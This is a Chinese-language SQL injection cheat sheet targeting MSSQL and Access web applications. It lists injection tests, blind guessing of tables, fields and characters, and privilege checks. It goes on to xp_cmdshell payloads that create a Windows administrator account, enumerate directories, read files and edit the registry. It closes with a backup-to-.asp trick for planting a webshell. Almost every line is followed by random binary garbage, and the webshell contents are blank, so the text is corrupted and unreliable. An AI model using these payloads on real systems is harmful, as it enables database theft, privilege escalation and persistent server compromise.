1.判断是否有注入;and 1=1 ;and 1=2 se %#U4�0*
2.初步判断是否是mssql ;and user>0 V��8 8�u�-
�?�YR;o��4
3.注入参数是字符'and [查询条件] and ''=' �d.����+��
v��_��5q�E
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ru 6`�Z+p�
[��<@�T%yq
5.判断数据库系统 y\^zx�G*]'
bK%F_v3'��
;and (select count(*) from sysobjects)>0 mssql [�<f2h-�V$
*fc8M(�]&d
;and (select count(*) from msysobjects)>0 access y�Z6WbI�8n
�AVQcD`V3B
�39 }e
}W"
,;}���
��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 w��{DU<�e:
�"'�[M�~Js
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 s`=| D'G(=
9f0`H�v�HC
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �B��bs1�U�
`3\U9ZH2�3
9.(1)猜字段的ascii值(access) �I%�r7�L��
$/"Ymm#"\Y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 P1[.�[q/-e
a?+�C]u?_D
(2)猜字段的ascii值(mssql)
3g!Z�[SZ�
��4A@H��R�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �Wd7*7'�]�
8�J'�5%$3u
10.测试权限结构(mssql) =? !FO'zt"
(E0WZ��$f}
�)q_,V"���
�dY}5Km�t�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- HE+�'�fQ!R
U>*@VO��gB
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- I*T�TD]e'X
�\m|5�Aq�s
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �vxPE�=�!|
� ��i��t H
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- @I4HpY�7:
F'[Y.tA ,#
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- aQ(�P#n>a2
d3rj�j4N"z
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �aU;X&g+_)
_UTN4z2aTG
;and 1=(select IS_MEMBER('db_owner'));-- ��E�|9`J00
=)+^��y}xb
gH(#<f@�ZI
��uq]�=L�
11.添加mssql和系统的帐户 �Q<6* UUQm
+�Zj�DTTk�
;exec master.dbo.sp_addlogin username;-- 25Z}�.)�)�
;exec master.dbo.sp_password null,username,password;-- W]Xwt'ABz�
%R4 �\[��e
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- DtBvfYO8)>
�H����R?T�
;exec master.dbo.xp_cmdshell 'net user username password Wy-_�}wqHg
AAfU]4�u0S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �,K}"��o~z
�f�B<�Qs.T
;exec master.dbo.xp_cmdshell 'net user username password /add';-- O8#�]7��\)
vX>{1`�e{S
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ,$t1LV;o=�
g0�B-<>�E�
�tb?TPd-OY
@:w�^j�0+h
12.(1)遍历目录 -`5]%.E&�8
�xT&/�xZLT
;create table dirs(paths varchar(100), id int) [g��UD�� +
�rOLZiE�T�
;insert dirs exec master.dbo.xp_dirtree 'c:\' vW.f`J,\D'
�JG�^G�EJ
;and (select top 1 paths from dirs)>0 �~�c �v�|,
1:<n�(?5JI
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &zgl�iT!If
��TX�YO��{
�z4D)X�y"/
��'�J�*'�{
(2)遍历目录 �+(x(Ybl�#
U^[A�W$WzU
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��RU/WI<O�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U=� GJuixy
&j�Ew(P&�_
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
M3UC�9t9]
Il\{m�?Y��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 |a��]���)o
���O��=��}
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��p5�rq>&"
�93Gj�#�Mk
IIMf�\�JdM
< (9
BO��&
13.mssql中的存储过程 %h�o?KU2j
�LR.]&(kyd
xp_regenumvalues 注册表根键, 子键 !��_+FuF"@
_)����pOkS
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��*eXs7�"H
O�S�uQ�7�V
xp_regread 根键,子键,键值名 KgY�QxEbIW
3�bGU;�2~}
;exec xp_regread /AX�)n:,��
`y�l|�N��L
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 {�TJ�"��O
TPx0LDk�%(
xp_regwrite 根键,子键, 值名, 值类型, 值 �dL'�oIB�p
)]�w&�DNc
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �a%�m�>v�,
��]7,�0>��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 0;1�O;JRw�
g}�6�M+QNj
xp_regdeletevalue 根键,子键,值名 ,^1� �#Uz8
�N��4�9{J~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 KJ&I�4CU]^
Zd)LV���c[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �,�*�V%��
4�j+��M�<g
?�gA�wMP(>
=v|$d�D�z�
14.mssql的backup创建webshell +5�O^{Ce�6
$pP�c}M[h
use model 6C"${}S�F`
jN=
!Q&^i[
create table cmd(str image); {�L�KW%G7�
GRj [�2I7:
insert into cmd(str) values (''); ]n1#8T&<*z
��8:I-?z;S
backup database model to disk='c:\l.asp';
S�tNA(+rT
�&�!�:mL],
�0%rE*h9+�
wmbG�$T%�k
15.mssql内置函数 (@���BB�@G
�AVz9�07h8
;and (select @@version)>0 获得Windows的版本号 2sqH
>�fen
�(G��{:O��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ou�)0tX3j�
�"kc%d�'c(
;and (select user_name())>0 爆当前系统的连接用户 0"\��js:-$
yHf^6��|$8
;and (select db_name())>0 得到当前连接的数据库 �p+nB@fN/�
u1'l�4VgT
�Wxj�(3lg/
Wl&6T1�A`"
16.简洁的webshell +�sZY0(|K8
FD~�uU�ZTM
use model #W�l9[W�/4
~r�})&`�5
create table cmd(str image); �y9i+��EV�
�X+\=dhn69
insert into cmd(str) values (''); �#�Ph8��?�
�?`
ebi|�6
backup database model to disk='g:\wwwtest\l.asp';
